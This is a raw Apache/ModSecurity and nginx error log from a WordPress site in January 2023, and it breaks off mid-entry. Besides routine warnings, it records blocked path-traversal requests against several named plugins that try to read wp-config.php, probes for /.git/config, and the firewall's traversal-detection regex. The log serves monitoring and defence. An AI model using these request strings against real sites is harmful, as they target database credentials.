by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/Decode/HTML/index.php [Fri Jan 20 10:03:51.915706 2023] [:error] [pid 14568:tid 140206111975168] [client 5.188.62.174:55636] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8qtVxXlsFydqPtpkt7DhAAAAME"] [Fri Jan 20 14:15:33.971119 2023] [autoindex:error] [pid 14313:tid 140206053226240] [client 172.106.113.215:41750] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Fri Jan 20 16:06:51.748650 2023] [autoindex:error] [pid 14313:tid 140205969299200] [client 168.119.149.8:51184] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Fri Jan 20 16:07:03.754852 2023] [autoindex:error] [pid 14311:tid 140206070011648] [client 168.119.149.8:51192] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php 2023/01/20 18:12:10 [error] 14152#14152: *271562 access forbidden by rule, client: 35.167.18.6, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jan 20 21:09:36.130969 2023] [autoindex:error] [pid 14568:tid 140206078404352] [client 103.1.208.207:38624] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Fri Jan 20 21:09:37.785923 2023] [autoindex:error] [pid 14311:tid 140206078404352] [client 103.1.208.207:38634] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/midnight/index.php [Fri Jan 20 22:43:47.359200 2023] [autoindex:error] [pid 14568:tid 140206086797056] [client 195.181.248.219:43248] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Sat Jan 21 03:12:32.508290 2023] [ssl:warn] [pid 19762:tid 140010086365056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 21 03:12:32.633547 2023] [ssl:warn] [pid 19763:tid 140010086365056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 21 03:12:33.051641 2023] [ssl:warn] [pid 19763:tid 140010086365056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 21 03:12:34.742536 2023] [ssl:warn] [pid 19763:tid 140010086365056] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 21 03:12:37.061218 2023] [ssl:warn] [pid 20269:tid 140503768799104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 21 03:12:37.170652 2023] [ssl:warn] [pid 20270:tid 140503768799104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Jan 21 15:42:31.103920 2023] [:error] [pid 20720:tid 140503479744256] [client 20.234.111.207:37870] [client 20.234.111.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "Y8xON63eeeEWGcHIKKe2LwAAAMQ"], referer: https://www.google.com/search? [Sat Jan 21 15:42:36.317670 2023] [:error] [pid 20720:tid 140503404209920] [client 20.234.111.207:37874] [client 20.234.111.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y8xOPK3eeeEWGcHIKKe2MQAAAM0"], referer: https://www.google.com/search? [Sat Jan 21 15:42:41.345521 2023] [:error] [pid 20289:tid 140503562999552] [client 20.234.111.207:37878] [client 20.234.111.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y8xOQXlN7OulnNa2J9uhKQAAAIM"], referer: https://www.google.com/search? [Sat Jan 21 15:42:46.507130 2023] [:error] [pid 20289:tid 140503412602624] [client 20.234.111.207:37880] [client 20.234.111.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "Y8xORnlN7OulnNa2J9uhKgAAAIw"], referer: https://www.google.com/search? [Sat Jan 21 15:42:51.143695 2023] [:error] [pid 20720:tid 140503562999552] [client 20.234.111.207:37886] [client 20.234.111.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "Y8xOS63eeeEWGcHIKKe2MgAAAMM"], referer: https://www.google.com/search? [Sat Jan 21 15:45:53.337977 2023] [:error] [pid 20720:tid 140503562999552] [client 20.234.111.207:38060] [client 20.234.111.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=./../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "Y8xPAa3eeeEWGcHIKKe2WAAAAMM"], referer: https://www.google.com/search? [Sun Jan 22 00:44:30.360929 2023] [:error] [pid 20288:tid 140503437780736] [client 5.188.62.26:60156] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8zNPtHSiRsxSiUUl3nfngAAAEk"] [Sun Jan 22 03:13:31.478028 2023] [ssl:warn] [pid 12129:tid 140446255093632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 22 03:13:31.599243 2023] [ssl:warn] [pid 12130:tid 140446255093632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 22 03:13:31.961150 2023] [ssl:warn] [pid 12130:tid 140446255093632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 22 03:13:33.603010 2023] [ssl:warn] [pid 12130:tid 140446255093632] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 22 03:13:35.849113 2023] [ssl:warn] [pid 12577:tid 140419478275968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 22 03:13:35.957793 2023] [ssl:warn] [pid 12578:tid 140419478275968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jan 22 05:46:50.259233 2023] [autoindex:error] [pid 12597:tid 140419191011072] [client 194.169.175.71:43050] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jan 23 03:16:23.634976 2023] [ssl:warn] [pid 15212:tid 140310986585984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 23 03:16:23.781583 2023] [ssl:warn] [pid 15213:tid 140310986585984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 23 03:16:24.089690 2023] [ssl:warn] [pid 15213:tid 140310986585984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 23 03:16:25.657228 2023] [ssl:warn] [pid 15213:tid 140310986585984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 23 03:16:27.924480 2023] [ssl:warn] [pid 15636:tid 140575117887360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jan 23 03:16:28.063052 2023] [ssl:warn] [pid 15637:tid 140575117887360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 24 01:56:14.480027 2023] [:error] [pid 15657:tid 140574740932352] [client 5.188.62.76:60010] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y8-BDl5D0_G7LbIW-xnmZwAAAI8"] [Tue Jan 24 03:41:22.805738 2023] [ssl:warn] [pid 24566:tid 139916479375232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 24 03:41:22.937658 2023] [ssl:warn] [pid 24567:tid 139916479375232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 24 03:41:23.523024 2023] [ssl:warn] [pid 24567:tid 139916479375232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 24 03:41:25.287950 2023] [ssl:warn] [pid 24567:tid 139916479375232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 24 03:41:29.394037 2023] [ssl:warn] [pid 25043:tid 140152733030272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 24 03:41:29.543460 2023] [ssl:warn] [pid 25044:tid 140152733030272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jan 24 17:27:54.666798 2023] [autoindex:error] [pid 25063:tid 140152544016128] [client 209.126.2.21:51332] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Tue Jan 24 21:05:57.150503 2023] [autoindex:error] [pid 25351:tid 140152416491264] [client 193.202.110.17:59756] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Tue Jan 24 22:04:19.698469 2023] [autoindex:error] [pid 25063:tid 140152332564224] [client 93.157.100.49:33396] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Text/index.php [Tue Jan 24 22:04:20.215864 2023] [autoindex:error] [pid 25061:tid 140152416491264] [client 93.157.100.49:33398] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Text/index.php [Wed Jan 25 00:44:33.073610 2023] [autoindex:error] [pid 25063:tid 140152315778816] [client 74.208.59.223:38912] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Wed Jan 25 03:15:03.911809 2023] [autoindex:error] [pid 25351:tid 140152382920448] [client 141.94.87.67:44032] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Wed Jan 25 03:40:48.048776 2023] [ssl:warn] [pid 4248:tid 140160753932160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 25 03:40:48.184311 2023] [ssl:warn] [pid 4249:tid 140160753932160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 25 03:40:48.560025 2023] [ssl:warn] [pid 4249:tid 140160753932160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 25 03:40:50.357523 2023] [ssl:warn] [pid 4249:tid 140160753932160] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 25 03:40:52.680776 2023] [ssl:warn] [pid 4664:tid 140176413345664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 25 03:40:52.816572 2023] [ssl:warn] [pid 4665:tid 140176413345664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jan 25 14:23:18.599113 2023] [ssl:warn] [pid 4665:tid 140176413345664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 03:41:19.844856 2023] [ssl:warn] [pid 7802:tid 140274174764928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 03:41:19.978933 2023] [ssl:warn] [pid 7803:tid 140274174764928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 03:41:20.311165 2023] [ssl:warn] [pid 7803:tid 140274174764928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 03:41:22.053557 2023] [ssl:warn] [pid 7803:tid 140274174764928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 03:41:25.678169 2023] [ssl:warn] [pid 8316:tid 139906623473536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 03:41:25.788116 2023] [ssl:warn] [pid 8317:tid 139906623473536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 06:17:18.297531 2023] [:error] [pid 8643:tid 139906227574528] [client 5.188.62.174:46458] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y9JhPmXFmgPtVez5WxkGYgAAANE"] [Thu Jan 26 08:44:19.059923 2023] [ssl:warn] [pid 8317:tid 139906623473536] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Jan 26 10:03:24.364465 2023] [autoindex:error] [pid 23755:tid 139906194003712] [client 43.153.78.152:55140] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jan 26 14:40:42.306818 2023] [autoindex:error] [pid 23755:tid 139906319894272] [client 92.205.8.185:39280] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/tag-cloud/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/tag-cloud/index.php 2023/01/26 21:14:13 [error] 23748#23748: *541371 access forbidden by rule, client: 54.82.242.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/01/26 21:14:13 [error] 23748#23748: *541372 access forbidden by rule, client: 54.82.242.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/01/26 21:14:13 [error] 23748#23748: *541373 access forbidden by rule, client: 54.82.242.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/01/26 21:14:13 [error] 23749#23749: *541374 access forbidden by rule, client: 54.82.242.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/01/26 21:14:13 [error] 23748#23748: *541377 access forbidden by rule, client: 54.82.242.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/01/26 21:14:13 [error] 23749#23749: *541378 access forbidden by rule, client: 54.82.242.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Jan 27 03:43:23.206794 2023] [ssl:warn] [pid 25179:tid 140033658087296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 27 03:43:23.338959 2023] [ssl:warn] [pid 25180:tid 140033658087296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 27 03:43:23.722977 2023] [ssl:warn] [pid 25180:tid 140033658087296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 27 03:43:25.460830 2023] [ssl:warn] [pid 25180:tid 140033658087296] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 27 03:43:27.829168 2023] [ssl:warn] [pid 25624:tid 139818368718720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 27 03:43:27.947995 2023] [ssl:warn] [pid 25625:tid 139818368718720] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Jan 27 16:47:49.825860 2023] [:error] [pid 25642:tid 139817920669440] [client 5.188.62.76:40924] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Y9RGhafRh7iQ2jgn1PDo2AAAABc"] [Fri Jan 27 19:48:26.598423 2023] [:error] [pid 25645:tid 139817920669440] [client 185.65.134.167:48668] [client 185.65.134.167] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file 